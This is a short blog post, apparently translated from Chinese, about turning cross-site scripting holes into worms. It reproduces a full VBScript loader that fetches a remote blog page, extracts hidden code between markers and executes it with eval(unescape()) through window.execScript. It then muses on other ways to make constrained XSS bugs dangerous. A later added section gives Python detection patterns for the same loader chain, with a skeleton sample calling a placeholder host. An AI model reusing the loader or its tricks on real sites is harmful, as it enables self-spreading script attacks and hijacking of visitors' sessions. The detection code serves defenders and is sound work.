Today I saw an Ajax hack demonstration on my dream BLOG. Finding a cross-site hole is actually very easy, but turning it into serious damage is still hard: stealing cookies only affects individual users, while an XSS worm is what is truly terrifying.
Let's take a look at his VBScript script (the doubled quotes are VBScript's quote escaping inside the outer execute string; the listing below is the original code with the extraction spacing cleaned up):

vbscript:execute("
dim l, s:
l = chr(13) + chr(10):
s = ""sub mycode"" & l:
s = s & ""dim http, url, pg, p, p2, cd, ht, o"" & l:
s = s & ""url = "http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""" & l:
s = s & ""set http = createobject("Microsoft.XMLHTTP")"" & l:
s = s & ""http.open "get", url, false"" & l:
s = s & ""http.send()"" & l:
s = s & ""pg = http.responseText"" & l:
s = s & ""p = instr(1, pg, "ILOVEUNING-BEGIN")"" & l:
s = s & ""if p = null or p < 1 then exit sub"" & l:
s = s & ""p = instr(p, pg, chr(37))"" & l:
s = s & ""if p = null or p < 1 then exit sub"" & l:
s = s & ""p2 = instr(p, pg, chr(60))"" & l:
s = s & ""cd = mid(pg, p, p2 - p)"" & l:
s = s & ""ht = "eval(unescape('" & cd & "'))""" & l:
s = s & ""window.execScript ht, "jscript""" & l:
s = s & ""end sub"" & l:
execute(s):
document.body.onload = getref(""mycode""):
")
The code that gets called lives at http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html
In this way, code hosted on that site is pulled in and executed. In other words, it may get around the restrictions that usually hamper Ajax hacks (a cross-site submission has no permission, and the XSS payload length is limited); I have not run any experiments on this myself.
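From the defender's side, the loader above has a recognisable shape: a vbscript: URI wrapping execute(), an XMLHTTP fetch of a staging page, code cut out of that page with instr()/mid(), and eval(unescape(...)) run through window.execScript. The following is an added example, not code from the post, that flags that chain in a candidate payload and pulls out the staging URL for follow-up; the indicator names, the sample strings and the verdict rule are my own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicators modelled on the loader discussed in the post (assumed names).
INDICATORS = {
    "vbscript_uri":  re.compile(r"(?i)\bvbscript\s*:"),
    "vb_execute":    re.compile(r"(?i)\bexecute\s*\("),
    "xmlhttp":       re.compile(r"(?i)createobject\s*\(.{0,8}microsoft\.xmlhttp"),
    "marker_cut":    re.compile(r"(?i)\binstr\s*\(.*\bmid\s*\(", re.S),
    "eval_unescape": re.compile(r"(?i)eval\s*\(\s*unescape\s*\("),
    "execscript":    re.compile(r"(?i)\bexecscript\b"),
}
# The staging page the loader fetches: the "url = ..." assignment in the payload.
URL_RE = re.compile(r"(?i)\burl\s*=\s*[\"']*\s*(https?://[^\s\"'&]+)")


@dataclass
class Finding:
    hits: List[str] = field(default_factory=list)
    staging_url: Optional[str] = None

    @property
    def is_remote_loader(self) -> bool:
        # fetch + execute is the chain the post relies on; the other hits add confidence
        return "xmlhttp" in self.hits and (
            "eval_unescape" in self.hits or "execscript" in self.hits)


def inspect_payload(text: str) -> Finding:
    """Classify one candidate payload (URL fragment, request body, stored field)."""
    f = Finding()
    for name, rx in INDICATORS.items():
        if rx.search(text):
            f.hits.append(name)
    m = URL_RE.search(text)
    if m:
        f.staging_url = m.group(1)
    return f


# Constructed samples: a skeleton of the loader (not a working payload) and a benign link.
SAMPLE_LOADER = (
    'vbscript:execute("dim l,s:l=chr(13)+chr(10):s=""sub mycode""&l:'
    's=s&""url=""""http://staging.example/page.html""""""&l:'
    's=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:'
    's=s&""p=instr(1,pg,""""MARK-BEGIN"""")""&l:s=s&""cd=mid(pg,p,p2-p)""&l:'
    's=s&""ht=""""eval(unescape(\'""&cd&""\'))""""""&l:'
    's=s&""window.execScript ht,""""jscript""""""&l:execute(s)")'
)
SAMPLE_BENIGN = "<a href='http://example.com/help'>Help</a>"
```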
Another idea is to write the script into the yundun shard before eval. By combining these two ideas, we may be able to work a miracle even with a very constrained XSS vulnerability!